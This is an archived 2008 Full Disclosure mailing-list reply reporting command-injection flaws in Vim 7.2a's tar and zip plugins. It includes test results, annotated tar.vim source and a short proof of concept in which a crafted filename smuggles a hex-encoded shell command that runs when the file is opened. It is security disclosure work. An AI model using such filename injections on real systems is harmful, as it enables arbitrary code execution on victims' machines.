Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: Collection of Vulnerabilities in Fully Patched Vim 7.1
From: "Jan Minář" <rdancer () rdancer org>
Date: Tue, 1 Jul 2008 20:36:29 +0100

On Sat, Jun 14, 2008 at 2:09 PM, Bram Moolenaar <Bram () moolenaar net> wrote:

Jan Minar wrote:

1. Summary

Product  : Vim -- Vi IMproved
Version  : Tested with 7.1.314 and 6.4
Impact   : Arbitrary code execution
Wherefrom: Local and remote
Original : http://www.rdancer.org/vulnerablevim.html

Improper quoting in some parts of Vim written in the Vim Script can lead to
arbitrary code execution upon opening a crafted file.

Note that version 7.1.314, as reported in the Summary, does not have
most of the reported problems.  The problems in the plugins have also
been fixed, this requires updating the runtime files.  Information about
that can be found at http://www.vim.org/runtime.php

I do apologize: as written in the advisory, the version I worked with
was 7.1.298.  7.1.314 was only partly vulnerable.  FWIW, I have
updated the advisory at http://www.rdancer.orgvulnerablevim.html .

Thanks to Bram for all the good work.

7.2a.10 with updated runtime is still vulnerable to the zipplugin
attack, and an updated tarplugin attack:

-------------------------------------------
-------- Test results below ---------------
-------------------------------------------
filetype.vim
  strong  : EXPLOIT FAILED
  weak    : EXPLOIT FAILED
tarplugin : EXPLOIT FAILED
tarplugin.updated: VULNERABLE
zipplugin : VULNERABLE
xpm.vim
  xpm     : EXPLOIT FAILED
  xpm2    : EXPLOIT FAILED
  remote  : EXPLOIT FAILED
gzip_vim  : EXPLOIT FAILED
netrw     : EXPLOIT FAILED

The original tarplugin exploit now produces a string of telling error messages:

        /bin/bash: so%: command not found
        tar: /home/rdancer/vuln/vim/tarplugin/sploit/foo'|sosploit/foo:
Cannot open: No such file or directory
        tar: Error is not recoverable: exiting now
        /bin/bash: retu: command not found
        /bin/bash: bar.tar|retu|'bar.tar: command not found

It's easy to see that it is still possible to execute arbitrary shell commands.

$VIMRUNTIME/autoload/tar.vim of Vim 7.2a.10:

        136   if tarfile =~# '\.\(gz\|tgz\)$'
        137 "   call Decho("1: exe silent r! gzip -d -c
".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")
       *138    exe "silent r! gzip -d -c -- ".s:Escape(tarfile)." |
".g:tar_cmd." -".g:tar_browseoptions." - "
        139   elseif tarfile =~# '\.lrp'
        140 "   call Decho("2: exe silent r! cat --
".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd."
-".g:tar_browseoptions." - ")
       *141    exe "silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c
-|".g:tar_cmd." -".g:tar_browseoptions." - "
        142   elseif tarfile =~# '\.bz2$'
        143 "   call Decho("3: exe silent r! bzip2 -d -c
".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")
       *144    exe "silent r! bzip2 -d -c -- ".s:Escape(tarfile)." |
".g:tar_cmd." -".g:tar_browseoptions." - "
        145   else
        146 "   call Decho("4: exe silent r! ".g:tar_cmd."
-".g:tar_browseoptions." ".s:Escape(tarfile))
      **147    exe "silent r! ".g:tar_cmd." -".g:tar_browseoptions."
".s:Escape(tarfile)
        [...]
        444 fun s:Escape(name)
        445   " shellescape() was added by patch 7.0.111
        446   if exists("*shellescape")
        447    let qnameq= shellescape(a:name)
        448   else
        449    let qnameq= g:tar_shq . a:name . g:tar_shq
        450   endif
        451   return qnameq
        452 endfun

 (*) s:Escape() does not suffice, as it fails to escape ``%'' and friends.

(**) tar(1) allows arbitrary command execution via options ``--to-command'',
     and ``--use-compress-program''.


The updated tarplugin attack is rather simple:

        $ rm -rf ./*
        $ touch "foo%;eval eval \`echo 0:64617465203e2070776e6564 |
xxd -r\`;'bar.tar"
        $ vim +:q ./foo*
        $ ls -l pwned
        -rw-r--r-- 1 rdancer users 29 2008-07-01 20:18 pwned

Cheers,
Jan Minar.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • Re: Collection of Vulnerabilities in Fully Patched Vim 7.1 Jan Minář (Jul 01)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault